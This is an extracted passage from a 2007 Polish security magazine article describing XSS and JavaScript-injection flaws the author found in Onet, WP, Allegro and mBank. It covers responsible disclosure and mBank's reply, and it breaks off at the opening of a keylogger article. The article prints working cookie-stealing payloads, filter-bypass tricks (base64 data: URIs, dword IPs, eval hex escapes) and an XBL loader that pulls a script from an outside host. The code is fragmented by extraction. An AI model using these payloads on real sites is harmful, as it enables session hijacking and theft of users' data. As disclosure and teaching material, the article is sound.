catch

(

)

{

req

false

;

}

(

req

)

{

req

open

(

"GET"

url

true

);

req

send

(

null

);

return

true

;

}

return

false

;

}

Listing 2.

Kod korzystający

z obiektu Image,

lang=JavaScript

function

SendRequest2

(

url

)

{

var

img

new

Image

();

img.src=url;

}

Listing 3.

Kod czyszczący dokument i dodający do jego treści obiekt

iframe, lang=JavaScript

document

setTimeout

(

document

innerHTML

””

;

document

innerHTML

”

iframe

width

100

height

100

+' src=

http://www.hakin9.org

></iframe>”;',100);

hakin9 Nr 4/2007

www.hakin9.org

Obrona

wadę. Jeśli bowiem skrypt serwisu nie
ma  zakodowanego  jakiegoś  specy-
ficznego  wykorzystania  JavaScript  w
danej przeglądarce, nie będzie w sta-
nie go wychwycić, co spowoduje eg-
zekucję kodu od razu po otwarciu ma-
ila. W tym momencie trzeba przyznać,
że  rozwiązanie  Onetu  jest  bardziej
wszechstronne. Przyjrzyjmy się nastę-
pującemu plikowi html, który znajduje
się na Listingu 4.

Jak widzimy przeglądarka zare-

aguje na taki kod przeniesieniem na

stronę javascript:alert(document.co-

okie), co w przypadku większości po-
pularnych  przeglądarek  spowoduje
uruchomienie kodu JavaScript w kon-
tekście właśnie przeglądanej domeny.
Innymi słowy ten szczególny kod do-
prowadzi  do  wyświetlenia  się  ciaste-
czek  zapamiętanych  w  przeglądar-
ce dla aktualnie przeglądanej strony,
w  tym  kluczy  sesji,  id  użytkownika  i
innych  prywatnych  danych.  Jak  już
wspomniałem  wcześniej,  w  przypad-
ku  Onetu  konieczne  jest  otworzenie
tego załącznika funkcją pokaż, w WP
wystarczy  natomiast  próba  przeczy-
tania maila. Ponadto w tym przypad-
ku,  ponieważ  serwis  nie  wykrył  żad-
nych znanych słów bądź zwrotów klu-
czowych,  nie  jesteśmy  nawet  powia-
damiani  o  grożącym  nam  niebezpie-
czeństwie.  Spójrzmy  więc  na  efekty
widoczne na Rysunku 1 i 2.

Jak łatwo zauważyć, atakujący

ma  bardzo  łatwy  dostęp  do  wszyst-
kich  naszych  danych,  a  dzięki  luce
Session  Fixation  możliwe  jest  prze-
jęcie  kontroli  nad  otwartym  kontem,
ściągnięcie listy kontaktów, czytanie ,
kasowanie, pisanie maili i wszystko to,
do czego ma prawo zalogowany użyt-
kownik. Ciekawym aspektem sprawy
jest to, że internauta nie ma żadnego
sposobu na uniknięcie ataku, oprócz
wyłączenia  obsługi  JavaScript,  co
jednak  wielokrotnie  utrudnia  lub  na-
wet  uniemożliwia  obsługę  poczty  za
pomocą przeglądarki.

W dzień po opisaniu wyżej wy-

mienionego  problemu  na  łamach
mojego  blogu  zauważyłem  zmianę
w sposobie działania WP. Nie wiem,
czy  była  to  reakcja  na  moje  odkry-
cie,  czy  zwykły  zbieg  okoliczności.
Nie mniej jednak, po krótkiej analizie
okazało się, że Wirtualna Polska fil-
truje zwrot javascript: i zamienia go
na, co w naszym wypadku uniemoż-
liwia  egzekucję.  Postanowiłem  nie-
znacznie zmodyfikować kod wysyła-
nego przez nas pliku, możemy zoba-
czyć to na Listingu 5.

Wprowadzona modyfikacja wyni-

ka z faktu, iż przeglądarki Netscape,
Mozilla Firefox, Opera i inne potrafią
przetwarzać adresy url zakodowane
w postaci base64. Dzięki tej modyfi-
kacji powinniśmy być w stanie ominąć

nowo wprowadzone zabezpieczenia.
I rzeczywiście kod wykonuje się bez
żadnego  problemu.  Niestety,  aby
doprowadzić  do  egzekucji  kodu  na
przeglądarce Internet Explorer trzeba
użyć  innej  metody  nie  wychwytywa-
nej jeszcze przez skrypty serwisu.

Po kilku dniach Onet wprowadził

zmiany w swoim serwerze, które są
równie rygorystyczne dla załączni-
ków html, co dla treści samego maila.
Spójrzmy na przykład zamieszczony
w Listingu 6.

Jak widzimy jest to jak najbardziej

poprawny  (przynajmniej  z  punktu  wi-
dzenia  validator.w3.org)  dokument
XHTML 1.1. Odwołuje się on do arku-
sza stylów css.css i skryptu JavaScript
script.js. Oba na serwerze server.com.
Oprócz  tego  przeglądarka  po  prze-
tworzeniu  tego  pliku  powinna  nam
wyświetlić napis Test w kolorze zielo-
nym i logo W3C. A teraz zobaczmy, co
otrzymamy od Onetu – Listing 7.

Jak możemy zauważyć, część

znaczników  została  zmieniona  (do-
dano  atrybut  target,  którego  wcze-
śniej nie było), a część po prostu usu-
nięta.  Oczywiście  w  przypadku  tak
prostej  strony  możemy  łatwo  napra-
wić wyrządzone szkody, jednakże w
wielu sytuacjach taka naprawa może
nam zająć sporo czasu. Poza tym w
przypadku bardziej skomplikowanych
stron, które używają dużej ilości CSS,
JavaScript, itp. uszkodzenia są o wie-
le bardziej rozległe. Odebrany przez
nas  mail  html  może  być  kompletnie
nieczytelny.  Co  więcej,  przeprowa-
dzone przeze mnie testy wykazały, iż
otwierając dużą ilość pustych znacz-
ników (

<<<

), możemy doprowadzić do

usunięcia całych fragmentów kodu.
Oczywiście po zapisaniu na dysku

Rysunek 2.

Efekt działania skryptu w WP

Rysunek 1.

Efekt działania skryptu w Onecie

Listing 4.

Przykładowy plik

html, lang=html

html

head

meta

equiv

"refresh"

content

"0;

url=javascript:alert
(document.cookie);"

head

body

html

Błędy w popularnych serwisach internetowych

hakin9 Nr 4/2007

www.hakin9.org

mail wraca do pierwotnej formy, jed-
nakże  ta  właściwość  serwisu  mo-
że  być  wykorzystana  na  niekorzyść
użytkownika.  Wyobraźmy  sobie  sy-

tuację, w której wirus rozprzestrze-
nia się za pomocą luki w przeglądar-
ce Internet Explorer, dodając się ja-
ko część treści maila w postaci html.

Użytkownik  odbierający  maila  zdaje
sobie  sprawę  z  niebezpieczeństwa  i
dlatego nie korzysta z poczty za po-
mocą  tej  przeglądarki.  W  pewnym
momencie  otrzymuje  na  przykład
kartkę  świąteczną  (w  postaci  maila
html) od rodziny. Sprawdza więc kod
strony i nie zauważa nic podejrzane-
go. Zapisuje zatem plik na dysku jako
pamiątkę,  ale  wirus  dołączył  własny
kod, jako treść tego maila, ukrywając
swoją obecność za pomocą otwiera-
nia  pustych  znaczników.  Mamy  tutaj
do czynienia z błędem zaufania. Je-
śli ów internauta zaufa treści załącz-
nika i w późniejszym terminie otworzy
treść  maila  za  pomocą  przeglądarki
Internet  Explorer,  jego  komputer  zo-
stanie zainfekowany.

Gdy kończyłem ten artykuł mi-

nął  już  tydzień  odkąd  powiadomi-
łem o tych nieprawidłowościach ser-
wisy Onet.pl i WP.pl. W tym celu uży-
łem  formularzy  znajdujących  się  na
stronach  portali.  Od  WP  nie  dosta-
łem  jeszcze  żadnej  odpowiedzi,  a
opisane  (i  nie  opisane)  błędy  nadal
funkcjonują. Co się tyczy Onetu, błę-
dów już nie ma, a jeden z czytelników
mojego  blogu,  który  później  okazał
się  pracownikiem  portalu,  pozosta-
wił  wpis  sugerujący,  iż  powinienem
się skontaktować z Onetem poprzez
adres  mailowy  abuse@onet.pl.  Tak
też uczyniłem i bardzo szybko dosta-
łem odpowiedź. Ustaliliśmy, iż w przy-
szłości wykryte luki będę zgłaszał do
Onetu w ten właśnie sposób, dając im
co najmniej 24 godziny na ich załata-
nie. Chciałbym zachęcić również czy-
telników do takiego samego postępo-
wania,  gdyż  gwarantuje  to  bezpie-
czeństwo  użytkownikom,  dając  czas
administratorom  na  załatanie  wykry-
tej  luki.  Powód,  dla  którego  postąpi-
łem  inaczej  był  prosty.  Nie  mogłem
napisać  na  ten  adres,  gdyż  nie  wie-
działem o jego istnieniu. Co prawda,
tego  typu  adresy  są  swego  rodzaju
standardem, ale niektóre serwisy sto-
sują się do tego, a inne nie. Właśnie
dlatego szukałem informacji na stro-
nie  portalu,  ale  tam  znalazłem  tylko
formularz kontaktowy, z którego sko-
rzystałem.  Ogólnie  reakcję  serwisu
należy ocenić pozytywnie. Błędy zo-
stały załatane w rozsądnym czasie, a

Listing 5.

Plik zmodyfikowany w celu ominięcia zabezpieczeń

wprowadzonych przez WP, lang=html

html

head

meta

http

equiv

"Content-type"

content

"text/html; charset=iso-8859-2"

meta

http

equiv

"Content-Language"

content

"pl"

title

Dokument

testowy

title

link

href

"http://server.com/css.css"

type

"text/css"

rel

"stylesheet"

script

src

"http://server.com/srcipt.js"

type

"text/javascript"

script

head

body

div

style

"color: green; text-align: center;"

Test

div

href

"http://validator.w3.org/check?uri=referer"

img

src

"http://www.w3.org/Icons/valid-xhtml10"

alt

"Valid XHTML 1.0 Strict"

height

"31"

width

"88"

body

html

Listing 7.

Odpowiedź Onetu na nasz przykładowy mail html, lang=html

<!--

config

[

server

002

]

group

stats

config

-->

DOCTYPE

html

PUBLIC

-//W3C//DTD XHTML 1.1//EN"

"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"

html

xmlns

"http://www.w3.org/1999/xhtml"

xml

lang

"pl-PL"

head

body

div

style

"color: green; text-align: center;"

Test

div

href

"http://validator.w3.org/check?uri=referer"

target

_blank

img

src

"http://www.w3.org/Icons/valid-xhtml10"

alt

Valid XHTML 1.0 Strict"

height

"31"

width

"88"

hakin9 Nr 4/2007

www.hakin9.org

Obrona

na wszelkie pytania udzielono szyb-
kiej i rzeczowej odpowiedzi. Posta-
wa Wirtualnej Polski pozostawia jed-
nak wiele do życzenia. Mimo poinfor-

mowania portalu w podobny sposób
(wysłałem odpowiedni mail na adres

abuse@wp.pl) nie dostałem żadnej
odpowiedzi. Co prawda po czterech

dniach  od  momentu  wysłania  owe-
go maila zauważyłem, że luka wyja-
śniona  powyżej  została  przez  ekipę
portalu załatana. Nieopisane na blo-
gu błędy jednak nadal funkcjonują, co
jest bezpośrednim wynikiem braku ja-
kiegokolwiek  kontaktu  z  moją  oso-
bą.  Ponadto  wystarczy  mała  mody-
fikacja  w  naszym  kodzie,  by  znowu
doprowadzić do JavaScript Injection.
Poprawka  Wirtualnej  Polski  polega
na zmianie wartości  http-equiv z re-
fresh na _refresh. Teoretycznie zała-
twia to sprawę, w praktyce jednak nie
jest to takie proste. Przyjrzyjmy się Li-
stingowi 8.

Oczywiście także tu użytkownik

nie  zostanie  nawet  poinformowany  o
grożącym mu niebezpieczeństwie. Po
kliknięciu na link zostanie uruchomio-
ny kod JavaScript. Dzieje się tak po-
nieważ wiele przeglądarek jest w sta-
nie  przetwarzać  linki  w  postaci  data:
W tym przypadku wykorzystaliśmy ko-
dowanie base64, co skutecznie ukryło
wszystkie słowa kluczowe. Jak można
zauważyć, podejście do problemu, ja-
kie zaprezentowała Wirtualna Polska,
do tej pory nie gwarantuje bezpieczeń-
stwa. Nie można się skupiać tylko na
jednym przykładzie błędu. Takie sytu-
acje są idealne dla ludzi, których ce-
lem jest kradzież naszych danych oso-
bistych. Jak już napisałem na począt-
ku, jest to jedynie modyfikacja nasze-
go  podstawowego  pliku.  Gdyby  ad-
ministratorzy  przeanalizowali  dokład-
nie przedstawione przeze mnie przy-
kłady,  szybko  zauważyliby,  że  doda-
nie  następnej  regułki  do  wyelimino-
wania kolejnego słowa kluczowego w
tym przypadku nie pomoże. Jak wcze-
śniej  wspomniałem,  w  całym  artyku-
le skupiłem się wyłącznie na jednym,
prostym problemie. Ani w tym tekście,
ani na swoim blogu nie opisywałem in-
nych  błędów,  ponieważ  zdaję  sobie
sprawę,  iż  ich  załatanie  może  trwać
dość długo. Mamy tutaj do czynienia z
poważnym błędem systemowym, któ-
ry  może  skończyć  się  tragicznie  dla
użytkowników portalu. Na prośbę por-
talu chętnie przedstawiłbym wszystkie
zgromadzone  przeze  mnie  informa-
cje  dotyczących  defektów  zabezpie-
czeń stosowanych przez serwis. Nie-
stety  moje  spostrzeżenia  nie  spowo-

Rysunek 3.

Efekt działania skryptu w Allegro(kod)

Rysunek 5.

Kod z wstrzykniętym nowym elementem

Rysunek 4.

Efekt działania skryptu w Allegro(zrzut)

Błędy w popularnych serwisach internetowych

hakin9 Nr 4/2007

www.hakin9.org

dowały żadnej odpowiedzi, a Wirtual-
na Polska nadal pozostaje dziurawym
portalem.

Kolejna dziura w Allegro

Allegro  jest  największym  w  Polsce
serwisem aukcyjnym. Każdego dnia z
jego usług korzystają tysiące interna-
tów dokonując transakcji zakupu, bądź
sprzedaży  różnych  przedmiotów.  Je-
śli chcemy być w stanie wykonać któ-
rąkolwiek  z  tych  czynności,  musimy
być  zalogowani  do  wewnętrznej  czę-
ści serwisu zwanej Moje Allegro. Mniej
więcej tydzień przed Świętami Boże-
go Narodzenia ekipa hacking.pl odkry-
ła poważny błąd w zabezpieczeniach
Allegro,  który  pozwalał  atakującemu
na przejęcie kontroli nad kontem użyt-
kownika: wystawianie aukcji, kradzież
danych  prywatnych  itp.  Jak  się  oka-
zało,  była  to  luka  typu  XSS,  wynika-
jąca  z  braku  odpowiedniego  oczysz-
czania zmiennej

PHP _ SELF.

Co praw-

da, we wstrzykniętym kodzie nie moż-
na było używać cudzysłowów, lecz
używając funkcji String.fromCharCo-

de  autor  artykułu  bardzo  szybko  po-
radził  sobie  z  trudnościami  wykorzy-
stując  JavaScript  Injection  do  pełne-
go  XSS.  Około  trzech  tygodni  póź-
niej sam również zainteresowałem się
tym serwisem. Bardzo zaskoczył mnie
fakt, iż znalezienie kolejnego błędu za-
jęło mi 10 minut. Mimo, że portal po-
prawnie  przetwarzał  zarówno  dane
przekazywane  w  zmiennej

PHP _ SELF

jak i zmienne w tablicy

$ _ GET

oraz nie

było możliwości wstrzyknięcia żadne-
go kodu w ten sposób, to okazało się,
że  same  nazwy  zmiennych  nie  pod-
legały  żadnemu  sprawdzaniu.  Pod-
czas testów dowiedziałem się, iż ma-
my  pewne  ograniczenia,  ponieważ
nie  możemy  użyć  dwóch  przydat-
nych znaków: spacji i kropki. Jak wia-
domo  większość  przydatnych  funk-
cji  JavaScript  wymaga  kropki.  Może-
my  próbować  albo  od  razu  odwołać
się  do  zewnętrznego  skryptu  używa-
jąc  atrybutu  src,  albo  wpisywać  kod,
który to zrobi do znacznika script. Ja
zacząłem  od  tej  pierwszej  metody.
Dążymy  do  wstrzyknięcia  mniej  wię-
cej  takiego  kodu  :  <script  src=http:

//server.com/xss.js></script>. Oto ja-
kie stoją przed nami problemy: spacja

pomiędzy script i src oraz kropki w ad-
resie. Jak się okazuje, spację możemy
ominąć używając tabulatora, który nie
jest w żaden sposób filtrowany. Pozo-
staje więc tylko kwestia kropki. Na tym
etapie musiałem sięgnąć do różnych
artykułów dotyczących działania prze-
glądarek internetowych. Mniej więcej

po 30 minutach dowiedziałem się, że
adres IP może zostać zapisany w for-
macie dword, czyli na przykład: http:

//12341234/. Stworzyłem więc testo-
wy plik html, który został umieszczo-
ny w Listingu 9.

Zdziwił mnie fakt, iż przeglądarka

(zarówno Mozilla Firefox jak i Internet

Listing 8.

Plik zmodyfikowany w celu ominięcia nowych zabezpieczeń

WP, lang=html

<html>

head

body

href

”

data

text

html

;

base64

PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

Kliknij

body

html

Listing 9.

Plik będący próbą wykorzystania zapisu ip jako dword,

lang=html

xml

version

"1.0"

encoding

"iso-8859-2"

DOCTYPE

html

PUBLIC

-//W3C//DTD XHTML 1.1//EN"

"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"

html

xmlns

"http://www.w3.org/1999/xhtml"

xml

lang

"pl-PL"

head

meta

http

equiv

"Content-type"

content

"text/html; charset=iso-8859-2"

meta

http

equiv

"Content-Language"

content

"pl"

title

Dokument

testowy

title

head

body

script

src

http

127.0

0.1

ala

script

src

http

2130706433

ala

script

</body>

html

Listing 10.

Plik wykorzystywany do osiągnięcia XSS w przeglądarkach

z rodziny Gecko, lang=html

xml

version

"1.0"

bindings

xmlns

"http://www.mozilla.org/xbl"

xmlns

xbl

"http://www.mozilla.org/xbl"

xmlns

html

"http://www.w3.org/1999/xhtml"

xmlns

xul

"http://www.mozilla.org/keymaster/gatekeeper/

there.is.only.xul"

binding

"xss"

implementation

constructor

alert

(

"jasio"

);

var

ala

document

createElement

(

script

);

ala

src

"http://server.com/xss.js"

;

document

body

appendChild

(

ala

);

alert

(

document

);

constructor

implementation

binding

bindings

hakin9 Nr 4/2007

www.hakin9.org

Obrona

Explorer)  uruchamiają  tylko  pierwszy
kod.  W  logach  serwera http nie zna-
lazłem  nic  dziwnego.  Uruchomiłem
więc  własną  aplikację  nasłuchującą
na porcie 80, która na każde zapyta-
nie  odpowiadała  tym  samym  kodem.
Ponownie  wykonany  został  tylko
pierwszy kod. Przypuszczam, że jest
to  jakieś  zabezpieczenie,  jednakże
żadnych  szczegółowych  informacji
na ten temat nie udało mi się znaleźć.
Zmieniłem  wiec  taktykę.  Postanowi-
łem  wykorzystać  wiedzę  na  temat
różnych  funkcji  JavaScript  i  po  chwili
trafiłem  na  opis  funkcji  eval.  Jest  to
metoda,  która  traktuje  ciąg  znaków
jako kod i uruchamia go. To pozwala

na  rozwiązanie  wszystkich  naszych
problemów,  ponieważ  w  zapisie  ta-
kim  możemy  wykorzystywać  znany
z C sposób przedstawiania znaków za
pomocą  ich  wartości  ASCII  w  syste-
mie szesnastkowym, czyli na przykład
kropka zmienia się w \x2e. Wystarczy
skonstruować  więc  link,  w  którym
jako  nazwę  zmiennej  podamy:  jasio-

%22%25&%3E%3Cscript%3E

eval('alert(document%5Cx2ecoo

kie);');%3C/script%3E, a otrzymamy
rezultat widoczny na Rysunkach 3 i 4.

Teraz tylko modyfikujemy nasz

skrypt, by dodawał do kodu strony
nowy element i mamy już XSS – Ry-
sunek 5.

Nie poinformowałem portalu o

wykrytej  luce  czekając,  aż  admini-
stratorzy  sami  znajdą  błąd.  Jak  się
okazało, zajęło im to ponad miesiąc.
Jak przypuszczam Allegro liczyło na
to, że sprawa nigdy nie ujrzy światła
dziennego. Takie podejście nie wyda-
je się być zbyt odpowiedzialne. Użyt-
kownicy mają prawo wiedzieć o ryzy-
ku, jakie im grozi. Przypuszczam, że
gdybym napisał maila do Allegro z py-
taniem o stan bezpieczeństwa porta-
lu przed publikacją tej informacji, do-
wiedziałbym  się,  że  serwis  jest  bez-
pieczny i żadnego ryzyka z jego użyt-
kowania nie ma i nie było. Mam na-
dzieję, że po tej historii zmieni się to
na lepsze i błędy tak oczywiste będą
łatane szybciej niż w miesiąc.

Problemy z

bezpieczeństwem

mBanku

Postanowiłem  również  rzucić  okiem
na stronę mBanku, który jest jednym
z dwóch największych banków wirtu-
alnych w Polsce. Niestety i tutaj zna-
lazłem kilka luk, których wykorzysta-
nie  zagrażało  użytkownikom.  Błę-
dy  w  systemie  pozwalały  na  pełen
wgląd  do  danych  o  właścicielu  kar-
ty  (adres  zamieszkania,  email  itp.),
historii  przelewów,  informacji  o  loka-
tach,  danych  dotyczących  kart  kre-
dytowych (numer karty, limity, produ-
cent), informacji o zaciągniętych kre-
dytach czy wykupionych ubezpiecze-
niach oraz poznanie numerów list ha-
seł jednorazowych aktualnie zalogo-
wanego użytkownika. Na samym po-
czątku przeanalizowałem portal infor-
macyjny mBanku i już tutaj natrafiłem
na pierwszy błąd. Tekst wpisywany w
wyszukiwarkę mSzopu nie był w ża-
den  sposób  sprawdzany,  co  pozwa-
la na wstrzyknięcie dowolnego kodu.
Spójrzmy  na  przykładowy  link:  http:

//www.mbank.com.pl/mszop/mszuk

aj.html?query=jasio%22%3E%3C/if

rame%3E%3Cscript%3Ealert(/Blad

w mbanku/)%3C/script%3E . Nieste-
ty, ponieważ jest to tylko część infor-
macyjna, niebezpieczeństwo nie jest
aż tak duże, ale nadal luka może zo-
stać wykorzystana do ataku phishin-
gowego. Pomyślny XSS widoczny
jest na Rysunku 6.

Rysunek 8.

Pomyślne przechwycenie ciasteczek

Rysunek 7.

Fragment kodu pokazujący, jak mBank przechowuje zmienne

Rysunek 6.

Pomyślnie wykonany XSS w części informacyjnej mBanku

Błędy w popularnych serwisach internetowych

hakin9 Nr 4/2007

www.hakin9.org

Następnie przyjrzałem się części

wewnętrznej  serwisu.  Na  początku
miałem mniej szczęścia. Okazało się
bowiem,  że  serwis  filtruje  wszelkie
możliwe znaki, które mogą być wyko-
rzystane  do  wstrzyknięcia  kodu.  Już
miałem się poddać, gdy natknąłem się
na  następujący  fragment  kodu,  który
został zamieszczony na Rysunku 7.

Jakkolwiek można zauważyć war-

tość  zmiennej  sAccessFlag  nie  jest
umieszczana  w  cudzysłowach,  a  co
za  tym  idzie  możemy  wykonać  na
przykład,  https://www.mbank.com.pl/

ib_termdeposits.asp?sAccessFla-

g=jasio%20style=background-ima-

ge:url%28javascript:alert%28docu-

ment.cookie%29%29 czego efektem
jest przechwycenie ciasteczka, wi-
doczne na Rysunku 8.

Jeśli chcemy doprowadzić do XSS

w obu najpopularniejszych przeglą-
darkach (Internet Explorer i Mozilla Fi-
refox), musimy postąpić następująco.
Najpierw stworzyć atrybut style z war-
tością -moz-binding wskazującym na
plik, jak na Listingu 10.

Wykorzystujemy tutaj możliwość

przetwarzania przez przeglądarki z ro-
dziny Mozilla atrybutu styl jako specjal-
nego pliku xml, a dokładnie możliwość
zdefiniowania  tak  zwanego  konstruk-
tora.  W  praktyce  możemy  na  przy-
kład ustawić zachowania dla jednego
lub wielu elementów strony tuż po ich
utworzeniu  i  stąd  nazwa  konstruktor.
Następnie  użyć  drugiego  atrybut  sty-
le o wartości background-image:url(ja-

vascript:..). Możemy w ten sposób wy-
konać polecenie JavaScript, które uru-
chomione  na  przeglądarce  Internet
Explorer  doda  do  kodu  strony  nowy
element  script  odwołujący  się  do  na-
szego skryptu. Efekty pomyślnego wy-
korzystania  powyższej  luki  możemy
zobaczyć na Rysunkach 9 i 10.

W tym artykule zostały opisane

cztery przykładowe serwisy. Mimo, że
są to jedne z największych serwisów w

polskich zasobach sieci Internet, udało
się w nich wykryć bardzo poważne lu-
ki. Błędy te mogły zostać wykorzysta-
ne przeciwko użytkownikom serwisów
w  celu  wykradzenia  ich  prywatnych
danych, czy w ostateczności – pienię-
dzy.  Internet  jest  ciągle  niebezpiecz-
nym  miejscem  dla  nieświadomego
użytkownika, który korzystając z jego
możliwości ma do czynienia z olbrzy-
mią bazą informacji, ale również polem
bitwy między twórcami oprogramowa-
nia i stron internetowych, a crackerami
i phisherami starającymi się wykorzy-
stać  wszelkie  możliwe  błędy  do  kra-

dzieży  pieniędzy,  czy  spowodowania
zwyczajnego  zamieszania.  Polskie
portale powinny być świadome zagro-
żenia i przeciwdziałać mu. Do tej po-
ry można wykryć bardzo poważne błę-
dy w wielkich serwisach. Nie wspomnę
tym  bardziej  o  mniejszych,  które  nie
zajmują się nawet takimi problemami.
Warto zaznaczyć, iż Interia po zgłosze-
niu błędów, w ciągu roku nic nie zrobi-
ła w ich sprawie. Mam jednak nadzieję,
że w przyszłości będziemy mogli liczyć
na staranniejsze podejście do tematu
zabezpieczeń polskich serwisów inter-
netowych i ich wyższego poziomu. l

Rysunek 10.

Kod strony ukazujący nasze dodane elementy

Rysunek 9.

Pomyślny XSS, przeglądarka odwołuje się do naszego skryptu

O autorze

Michał  Majchrowicz,  student  III  roku
informatyki  na  wydziale  Elektrotechni-
ki,  Elektroniki,  Informatyki  i  Automaty-
ki Politechniki Łódzkiej.
Kontakt: mmajchrowicz@gmail.com

hakin9 Nr 4/2007

www.hakin9.org

Stanowisko mBanku

Podane w artykule informacje doty-
czące serwisu banku zostały dokład-
nie przeanalizowane przez eksper-
tów mBanku.

Analiza wykazała, że tylko przy wy-

stąpieniu  szczególnych  okoliczności
istniało prawdopodobieństwo wykorzy-
stania  przez  oszustów  internetowych
pewnego  pola  do  nadużyć,  polegają-
cego na umożliwieniu przeglądania da-
nych, o których wspomniano w artyku-
le. Stwierdzono, że zagrożenie mogło-
by dotyczyć tylko zalogowanego Klien-
ta, który przy jednoczesnym korzysta-
niu  z  serwisu  transakcyjnego  mBan-
ku, wywołałby spreparowany link, prze-
słany  za  pośrednictwem  poczty  elek-
tronicznej, komunikatorów itp. Analizo-
wana sytuacja nie była zatem możliwa
bez aktywnego udziału zalogowanego
użytkownika, jak również nie pozwalała

na wykonanie operacji i przelewów za-
twierdzanych  hasłem  jednorazowym
TAN lub kodem SMS. Wskazane przez
autorów artykułu pole do potencjalnych
nadużyć zostało usunięte w ciągu kil-
ku godzin od momentu pojawienia się
informacji na ten temat. Zgodnie z do-
tychczasową  praktyką  mBank  przy-
pomina swoim Klientom o stosowaniu
podstawowych  zasad  bezpiecznego
korzystania z Internetu i uczula, by ko-
rzystając z serwisu transakcyjnego nie
uruchamiali oni linków przesyłanych w
e-mailach,  wiadomościach  z  komuni-
katorów itp. Informacje dotyczące za-
bezpieczenia  komputera  osobistego
oraz podstawowych zasad bezpiecz-
nego  korzystania  z  Sieci  zamiesz-
czone  są  w  serwisie  mBanku  (http:

//www.mbank.com.pl/przewodnik/

bezpieczenstwo/).

Artykuły edukacyjne oraz porusza-

jące najnowsze zagadnienia związane
z podobną problematyką zamieszcza-
ne są w kolejnych numerach mBanko-
wego biuletynu "Bezpieczeństwo" (http:

//www.mbank.com.pl/przewodnik/

bezpieczenstwo/biuletyn.html).

Informacje dodatkowe

Magdalena Ossowska, Rzecznik praso-
wy mBanku, tel: 042 638 17 22, e-mail:
magdalena.ossowska@mbank.pl

Stanowisko mBanku

Media Systems

Firma Media Systems oferuje Państwu

profesjonalny system CashBill.pl,

umożliwiający zarządzanie usługami

SMS Premium Rate w sektorze B2B i

B2C.

Oferujemy również szeroki wachlarz

usług mikropłatniczych, płatności

elektronicznych oraz indywidualne, de-

dykowane rozwiązania przy budowie

aplikacji mobilnych.

TTS Company Sp. z o.o.

Oprogramowanie

komputerowe -

sprzedaż, dystrybucja oraz import na

zamówienie. W ofercie programy au-

torstwa ponad stu firm z całego świa-

ta. Zapraszamy do współpracy - zostań

naszym klientem lub dostawcą.

www.OprogramowanieKompute-

rowe.pl

Zepter IT

Zepter IT to dynamicznie rozwijająca

się firma, specjalizująca się w realiza-

cji projektów informatycznych.

Oferujemy rozwiązania dla biznesu i

zarządzania takie jak systemy ERP

czyli zarządzanie zasobami firmy, pod-

noszenie jakości i obniżanie kosztów.

Zepter IT świadczy również usługi in-

ternetowe - serwisy www, e-commerce,

tworzenie aplikacji internetowych oraz

systemów zarządzania treścią.

www.zepterit.com

Prenumerata PRO

t d

fta

: 2

www.hakin9.org

hakin9 Nr 4/2007

Atak

ak  działają  programy  przechwytujące  i
zapisujące  wszystkie  naciśnięte  przez
użytkowników  komputera  klawisze?  W

systemie Windows ich zadaniem jest zazwy-
czaj monitorowanie komunikatów związanych
z klawiaturą. Co to znaczy? Komunikaty (ang.

windows messages) tworzą niejako układ ner-
wowy systemu Windows, łączący go  z urucho-
mionymi w nim aplikacjami. To właśnie komu-
nikaty przekazują aplikacjom informacje o tym,
że została ona kliknięta myszką lub naciśnięty
został jakiś klawisz, przez co od aplikacji ocze-
kiwana jest w związku z tym jakaś reakcja. To,
co jest dla nas naturalne, np. kliknięcie przyci-
sku widocznego na oknie aplikacji i co użytkow-
nikowi komputera wydaje się odbywać jedynie
w kontekście samej aplikacji, w istocie angażu-
je system Windows – w końcu myszka i klawia-
tura nie są podłączone do aplikacji, a do kom-
putera zarządzanego przez Windows, to Win-
dows właśnie, a nie sama aplikacja, może od-
czytać  stan  tych  urządzeń.  Aplikacja  odcięta
od  strumienia  komunikatów  staje  się  głucha  i
niema (aby taki stan uzyskać wystarczy nadpi-
sać metodę

WndProc

okna aplikacji, nie wywołu-

jąc z niej metody nadpisywanej, i pozostawia-
jąc ją zupełnie pustą). W szczególności aplika-

cja przestaje zaś reagować na polecenia od-
świeżenia okna, co objawia się charaktery-
styczną „białą plamą” w miejscu jej interfejsu.

A w jaki sposób możliwe jest monitorowa-

nie przepływu komunikatów? System Windows
udostępnia mechanizm haków (ang. hooks). Po-
zwala on skojarzyć określony w haku typ komu-
nikatów ze zdefiniowaną przez użytkownika me-
todą. Haki mogą być ustawiane bądź w kontek-
ście konkretnej aplikacji, konkretnego wątku,

Hak na Windows

Jacek Matulewski

stopień trudności

Imię domowego zwierzaka i bieżący rok to najczęściej

wykorzystywany schemat haseł. Jednak, gdy hasło jest tak silne,

że nie można go wykryć typowymi metodami, istnieje groźba,

że zostanie ono podsłuchane. Nie chodzi o przysłuchiwanie się

osobom mamroczącym podczas pisania, lecz o podsłuchiwanie

klawiatury przez programy uruchomione w Windows.

Z artykułu dowiesz się...

• w jaki sposób korzystać z mechanizmu haków

systemu Microsoft Windows, w szczególności w
jaki sposób wykorzystać go do podsłuchiwania
klawiatury (np. w celu zdobycia loginów i haseł)

• pomysł na generator liczb losowych oparty na

monitorowaniu korzystania przez użytkownika
z klawiatury.

Powinieneś wiedzieć...

• wymagana jest ogólna orientacja w korzystaniu

z funkcji WinAPI oraz umiejętność projektowa-
nia bibliotek DLL.

Hak na Windows

hakin9 Nr 4/2007

www.hakin9.org

bądź globalnie. W tym drugim przy-
padku funkcja wykonywana będzie
po wykryciu każdego komunikatu mo-
nitorowanego typu w całej sieci ner-

wowej systemu i tylko ten rodzaj ha-
ka będzie nas teraz interesować. Ha-
ki globalne (ang. global hooks), a do-

kładniej ich funkcje zahaczone (ang.

hook procedure; nie znajduję lepsze-
go  tłumaczenia)  muszą  być  umiesz-
czone  w  bibliotece  DLL,  która  bę-
dzie  ładowana  do  przestrzeni  adre-
sowej każdej aplikacji, która otrzyma
monitorowany typ komunikatu. W ten
sposób dowolna aplikacja będzie mo-
gła  uruchomić  przygotowaną  przez
nas funkcję. To wszystko brzmi może
dość zawile, ale w praktyce nie okaże
się bardzo trudne do realizacji. Wyda-
je  mi  się,  że  nawet  niezbyt  zaawan-
sowany  programista  znający  choćby
pobieżnie  bibliotekę  WinAPI  i  mają-
cy  doświadczenie  z  tworzeniem  bi-
bliotek  DLL  powinien  sobie  z  haka-
mi poradzić.

Stawianie

haków w praktyce

Najlepiej poznać wroga studiując je-
go  metody.  Dlatego  przygotujemy
